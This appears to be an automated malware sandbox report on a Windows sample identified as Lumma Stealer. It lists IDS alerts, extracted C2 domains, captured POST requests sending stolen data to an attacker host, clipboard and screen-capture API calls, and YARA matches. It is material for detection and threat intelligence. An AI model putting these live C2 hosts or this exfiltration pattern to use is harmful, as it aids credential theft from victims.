Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov dword ptr [ebx], 00000022h	0_2_0068BE07
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0068EE1A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then mov ecx, eax	0_2_006A0E12
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh	0_2_006A2F87

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49732 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.112.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: skidjazzyric.click
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop
Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop

Source: Joe Sandbox View

IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6V7YNM87GSBM75User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YYZVB9J1Z0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8731Host: skidjazzyric.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ZBLQWT7ZO3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20390Host: skidjazzyric.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: skidjazzyric.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click

Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: DPlvBkg4aj.exe, 00000000.00000003.1722583194.0000000000752000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microh
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.3.dr	String found in binary or memory: http://upx.sf.net
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/
Source: DPlvBkg4aj.exe, 00000000.00000003.1734753371.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1748800807.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722583194.0000000000752000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1749641440.0000000002E84000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1762298757.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1747161139.0000000002E83000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000719000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/api
Source: DPlvBkg4aj.exe, 00000000.00000003.1734895986.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734753371.0000000002E87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/apix
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click:443/api
Source: DPlvBkg4aj.exe, 00000000.00000003.1723755981.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: DPlvBkg4aj.exe, 00000000.00000003.1734684614.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734785322.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723755981.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734981026.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: DPlvBkg4aj.exe, 00000000.00000003.1734684614.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734785322.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723755981.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734981026.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004367F0

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_004367F0

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,

0_2_00436980

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E8800D	0_3_02E8800D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E8800D	0_3_02E8800D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E8800D	0_3_02E8800D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E8800D	0_3_02E8800D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043B870	0_2_0043B870
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00408880	0_2_00408880
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040CA62	0_2_0040CA62
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041BBA0	0_2_0041BBA0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00421E70	0_2_00421E70
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00415720	0_2_00415720
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040CFEC	0_2_0040CFEC
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00419840	0_2_00419840
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00406850	0_2_00406850
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00427860	0_2_00427860
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00427070	0_2_00427070
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043080E	0_2_0043080E
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043F820	0_2_0043F820
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041D0C0	0_2_0041D0C0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004418A0	0_2_004418A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041194F	0_2_0041194F
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043F150	0_2_0043F150
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042B170	0_2_0042B170
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00403900	0_2_00403900
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00425100	0_2_00425100
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00439923	0_2_00439923
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00427133	0_2_00427133
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00433930	0_2_00433930
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004121DB	0_2_004121DB
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042A9F7	0_2_0042A9F7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040E9B0	0_2_0040E9B0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041825B	0_2_0041825B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042EA62	0_2_0042EA62
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00442A60	0_2_00442A60
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041DAD0	0_2_0041DAD0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00429ADE	0_2_00429ADE
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00425AF0	0_2_00425AF0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004092A0	0_2_004092A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040B2B0	0_2_0040B2B0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00405AB0	0_2_00405AB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004042B0	0_2_004042B0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043CB40	0_2_0043CB40
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042EB5F	0_2_0042EB5F
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00408360	0_2_00408360
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00428B67	0_2_00428B67
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00437B69	0_2_00437B69
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00402B20	0_2_00402B20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00441B20	0_2_00441B20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00432B24	0_2_00432B24
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004063C0	0_2_004063C0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042DBF0	0_2_0042DBF0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00422380	0_2_00422380
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042BBA0	0_2_0042BBA0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042EBA1	0_2_0042EBA1
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042EBB3	0_2_0042EBB3
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00441BB0	0_2_00441BB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00441C40	0_2_00441C40
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00442470	0_2_00442470
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00426C76	0_2_00426C76
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041D400	0_2_0041D400
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041C400	0_2_0041C400
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00417405	0_2_00417405
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00414C20	0_2_00414C20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00432426	0_2_00432426
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00428437	0_2_00428437
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043443D	0_2_0043443D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004354C4	0_2_004354C4
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00434CEF	0_2_00434CEF
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043A4EF	0_2_0043A4EF
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004374AB	0_2_004374AB
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041DCB0	0_2_0041DCB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043ACB0	0_2_0043ACB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0042FCBC	0_2_0042FCBC
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040D545	0_2_0040D545
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00425D6A	0_2_00425D6A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00435D13	0_2_00435D13
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00442D20	0_2_00442D20
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043CD27	0_2_0043CD27
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00404DC0	0_2_00404DC0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00420D90	0_2_00420D90
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0043C5A0	0_2_0043C5A0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00436610	0_2_00436610
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00407620	0_2_00407620
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040AE30	0_2_0040AE30
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041F6D0	0_2_0041F6D0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00416ED0	0_2_00416ED0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041BEE1	0_2_0041BEE1
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00402EF0	0_2_00402EF0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004186FC	0_2_004186FC
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00423EFF	0_2_00423EFF
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00431E8E	0_2_00431E8E
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041A690	0_2_0041A690
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0041AF24	0_2_0041AF24
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00427F30	0_2_00427F30
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0040DFE2	0_2_0040DFE2
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004257E0	0_2_004257E0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00429FE4	0_2_00429FE4
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00409790	0_2_00409790
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_004427B0	0_2_004427B0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00441FB0	0_2_00441FB0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006A2017	0_2_006A2017
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006920F5	0_2_006920F5
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006820D7	0_2_006820D7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006860B7	0_2_006860B7
